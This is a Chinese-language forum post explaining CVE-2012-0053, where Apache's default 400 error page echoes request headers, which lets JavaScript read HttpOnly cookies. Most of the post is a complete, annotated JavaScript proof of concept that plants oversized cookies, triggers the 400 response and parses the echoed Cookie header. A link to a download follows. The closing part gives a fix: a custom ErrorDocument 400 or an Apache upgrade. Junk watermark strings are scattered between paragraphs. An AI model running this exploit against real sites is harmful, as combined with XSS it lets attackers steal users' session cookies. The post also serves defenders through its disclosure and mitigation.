很多程序以及一些商业或成熟的开源 CMS/文章系统，为了防止 XSS 盗取用户 cookie，一般都会给 cookie 加上 HttpOnly 属性，禁止 JS 通过 document.cookie 直接读取，从而降低 XSS 的危害。而下面这个问题（Apache httpd 2.2.22 之前版本的默认 400 错误页会把出错的请求头原样回显）恰好可以绕过 HttpOnly：cookie 并不是由 JS 从 document.cookie 读出来的，而是由服务器在错误页正文里“吐”回来的，JS 只需读取 XHR 的 responseText 即可拿到完整的 Cookie 头。
$ ?1 G: L! Q. l
用 Chrome 打开目标站点的任意页面，按 F12 打开开发者工具，在 Console 中输入如下代码并回车（代码必须在目标站点自己的页面上执行，这样 XHR 才是同源请求，浏览器才会自动带上该站点的 cookie）：
* `# S0 }& a2 `. g2 q
// http://www.exploit-db.com/exploits/18442/
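// Plant or expire the padding cookies that force the server into a 400.
//
// good   - falsy: plant `count` cookies named xss0..xss(count-1), each holding
//          `size` bytes of "x", so the browser's next Cookie header for this
//          origin exceeds the server's request-header limit;
//          truthy: expire those same cookies again (clean-up).
// count  - number of padding cookies (default 10, as in the original PoC).
// size   - value length of each padding cookie in bytes (default 819).
//
// Side effect only: assigns document.cookie `count` times; returns nothing.
// With the defaults the values alone total 8190 bytes, which is Apache's
// default LimitRequestFieldSize, so the Cookie header is rejected with 400.
// Tune `count`/`size` when the target uses a different limit.
function setCookies(good, count, size) {
    var total = count === undefined ? 10 : count;
    var width = size === undefined ? 819 : size;
    // new Array(n + 1).join("x") yields n copies of "x" (ES5-safe, no String#repeat).
    var padding = new Array(width + 1).join("x");
    // An expiry one millisecond in the past makes the browser drop the cookie.
    var expired = new Date(+new Date() - 1).toUTCString();
    for (var i = 0; i < total; i++) {
        var name = "xss" + i;
        document.cookie = good
            ? name + "=;expires=" + expired + "; path=/;"
            : name + "=" + padding + ";path=/";
    }
}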
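// Probe the current origin for the Apache 400-page header echo
// (exploit-db 18442): plant oversized cookies, GET "/" via XHR, and if the
// server answers 400 with a page that echoes the request headers, pull the
// Cookie header out of its <pre> block and show it as JSON.
//
// Browser-only (needs XMLHttpRequest, document.cookie via setCookies, and
// alert) and must run on the target origin so the XHR carries its cookies.
// Side effects: writes document.cookie, sends one GET to "/", and shows one
// alert for any completed 400 response (an empty object if nothing could be
// parsed). The padding cookies are always expired again once the response
// has arrived, whatever its status. Returns nothing.
//
// Fixes over the original listing: `cookies.split(...)` was called on the
// array instead of on `cookies[i]` (TypeError), and `content.length` threw
// when the <pre> regex did not match (match() returns null).
function makeRequest() {
    // Plant the padding cookies before the request goes out.
    setCookies();

    // Turn a raw Cookie header value ("a=1; b=2") into a name -> value map.
    // Our own xssN padding cookies are dropped; names and values are
    // trimmed; only the first "=" splits, so values may themselves contain "=".
    function cookieHeaderToDict(header) {
        var dict = {};
        var pairs = header.replace(/xss\d+=x+;?/g, '').split(';');
        for (var i = 0; i < pairs.length; i++) {
            var pair = pairs[i].trim();
            if (pair === '') {
                continue;
            }
            var eq = pair.indexOf('=');
            if (eq === -1) {
                dict[pair] = '';
            } else {
                dict[pair.slice(0, eq).trim()] = pair.slice(eq + 1).trim();
            }
        }
        return dict;
    }

    var xhr = new XMLHttpRequest();

    // readystatechange handler: only a completed 400 response is interesting.
    xhr.onreadystatechange = function () {
        if (xhr.readyState !== 4) {
            return;
        }
        try {
            // A patched server (or one with a custom ErrorDocument 400) does
            // not echo the headers; anything but 400 means "nothing to read".
            if (xhr.status !== 400) {
                return;
            }
            // Apache's default 400 page puts the offending request header
            // inside <pre>...</pre>; flatten newlines first so "." spans it.
            var match = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
            var cookieDict = {};
            if (match) {
                cookieDict = cookieHeaderToDict(match[1].replace("Cookie: ", ""));
            }
            alert(JSON.stringify(cookieDict));
        } finally {
            // Always expire the padding cookies, even if parsing threw;
            // otherwise every later request to this origin keeps failing with 400.
            setCookies(true);
        }
    };

    xhr.open("GET", "/", true);
    xhr.send(null);
}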
// Entry point: plant the padding cookies and fire the probe immediately.
makeRequest();
8 O6 g+ p% `/ I, O; r
如果服务器是未修复的 Apache，你就能看见华丽丽的 400 错误页里原样回显的 Cookie 头，弹窗中即为解析出的 cookie（包括带 HttpOnly 属性的）。如果返回的不是 400，或者 400 页面里没有回显请求头，则说明该服务器不受此问题影响。
7 W% @/ j6 ~5 J w8 ?9 Z
下载地址：https://gist.github.com/pilate/1955a1c28324d4724b7b/download
; \! F* P; C* d0 c
修复方案:$ Q- G6 T# v/ B& ?. T/ Y0 |: p$ y
Apache 官方提供 4 种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下：
+ d$ r, W( x6 a- B1 ~3 t7 |. I( z; R( C6 E
In the event of a problem or error, Apache can be configured to do one of four things:
$ M( G6 w1 Q& V4 P; d9 {$ |9 ] K) ^4 i; r, \
1. output a simple hardcoded error message（输出一条简单的硬编码错误信息，即默认错误页）
2. output a customized message（输出一段自定义信息）
3. redirect to a local URL-path to handle the problem/error（转向一个本地的自定义页面）
4. redirect to an external URL to handle the problem/error（转向一个外部 URL）
) b8 ]2 U4 R7 h, W$ V" |7 l! H4 D8 L
经测试，对于 400 错误只有方法 2 有效，配置后返回包不再包含 cookie 内容。方法 1 的默认错误页正是会回显请求头的那一个；方法 3、4 推测是因为请求在解析请求头阶段就已失败（请求头超长），Apache 无法再对它做内部转向或外部跳转，所以对这类 400 不起作用。
1 {" A0 H$ l* T3 l- _; E+ R
Apache 配置（建议写在主配置或虚拟主机配置中，而不是 .htaccess：请求头超长的 400 在读取请求阶段就已产生，目录级配置可能来不及生效）：
+ R" Z" j2 N2 m0 ^& p9 A- o
ErrorDocument 400 "security test"
2 t# I$ g8 a# n G2 N3 O
当然，升级 Apache 到最新版本也可以解决（此问题在 2.2.22 中修复，修复后的默认 400 页面不再回显请求头）:)。
$ \6 o$ y% g) h" ^( J$ I& ]
参考：http://httpd.apache.org/security/vulnerabilities_22.html（对应条目 CVE-2012-0053，与上面 exploit-db 18442 为同一问题）
- G. Y/ k" z0 X, A- V |